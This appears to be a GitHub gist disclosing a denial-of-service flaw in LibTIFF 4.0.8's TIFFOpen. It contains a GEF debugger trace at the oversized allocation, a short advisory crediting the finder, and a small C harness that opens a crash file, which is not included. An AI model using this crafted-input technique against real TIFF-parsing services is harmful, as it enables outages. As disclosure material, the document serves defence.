Last active
July 26, 2017 23:51
-
-
Save dazhouzhou/1a3b7400547f23fe316db303ab9b604f to your computer and use it in GitHub Desktop.
poc
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
----------------------------------------------------------------------------------------------------------------------------------------------[ source:tif_dirread.c+5701 ]---- | |
5697 nstrips = TIFFhowmany_32(td->td_imagelength, rowsperstrip); | |
5698 if( nstrips == 0 ) | |
5699 return; | |
5700 | |
// tif=0x00007fffffffe028 -> [...] -> "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", newcounts=0x00007fffffffe040 -> 0x0000000020f222ec | |
->5701 newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64), | |
5702 "for chopped \"StripByteCounts\" array"); | |
5703 newoffsets = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64), | |
5704 "for chopped \"StripOffsets\" array"); | |
5705 if (newcounts == NULL || newoffsets == NULL) { | |
----------------------------------------------------------------------------------------------------------------------------------------------------------------[ threads ]---- | |
[#0] Id 1, Name: "TIFFOpen", stopped, reason: SINGLE STEP | |
------------------------------------------------------------------------------------------------------------------------------------------------------------------[ trace ]---- | |
[#0] 0x418d42->Name: ChopUpSingleUncompressedStrip(tif=0x67b010) | |
[#1] 0x414d2f->Name: TIFFReadDirectory(tif=0x67b010) | |
[#2] 0x419f76->Name: TIFFClientOpen(name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r", clientdata=0x7fff00000003, readproc=0x4210b6 <_tiffReadProc>, writeproc=0x421184 <_tiffWriteProc>, seekproc=0x421252 <_tiffSeekProc>, closeproc=0x4212a9 <_tiffCloseProc>, sizeproc=0x4212c9 <_tiffSizeProc>, mapproc=0x421311 <_tiffMapProc>, unmapproc=0x4213a6 <_tiffUnmapProc>) | |
[#3] 0x421421->Name: TIFFFdOpen(fd=0x3, name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r") | |
[#4] 0x421528->Name: TIFFOpen(name=0x44cf50 "crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", mode=0x44cf48 "r") | |
[#5] 0x404afd->Name: main() | |
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | |
5701 newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64), | |
gef> p nstrips | |
$2 = 0x11223344 | |
gef> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Title: LibTiff TIFFOpen Denial of Service Vulnerability | |
Version: V4.0.8 | |
Credit: Yu Zhou of Ant-financial Light-Year Security Lab | |
Description | |
In LibTIFF 4.0.8, there is a denial of service vulnerability in the TIFFOpen function. A crafted input will lead to a denial of service attack. | |
During the TIFFOpen process, the td_imagelength does not be checked. The value of td_imagelength can be directly controlled by input file. | |
In ChopUpSingleUncompressedStrip function, here will call _TIFFCheckMalloc function based on td_imagelength. If we set the value of td_imagelength | |
close to system memory, it will hung the system or trigger OOM killer. | |
The vulnerability can affect a lot of the software(e.g, ImageMagick) or system(e.g, Debian) used libtiff library, because it can be triggered in TIFFOpen function. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <sys/syscall.h> | |
#include <unistd.h> | |
#include <fcntl.h> | |
#include <string.h> | |
#include <errno.h> | |
#include "tiffio.h" | |
int main() | |
{ | |
TIFF *tif; | |
tif = TIFFOpen("crash-998b6dac084522aac42b8bfb30c6439e3bfccc98", "r"); | |
if (tif == NULL) | |
{ | |
printf("TIFFOpen error!\n"); | |
return 0; | |
} | |
TIFFClose(tif); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment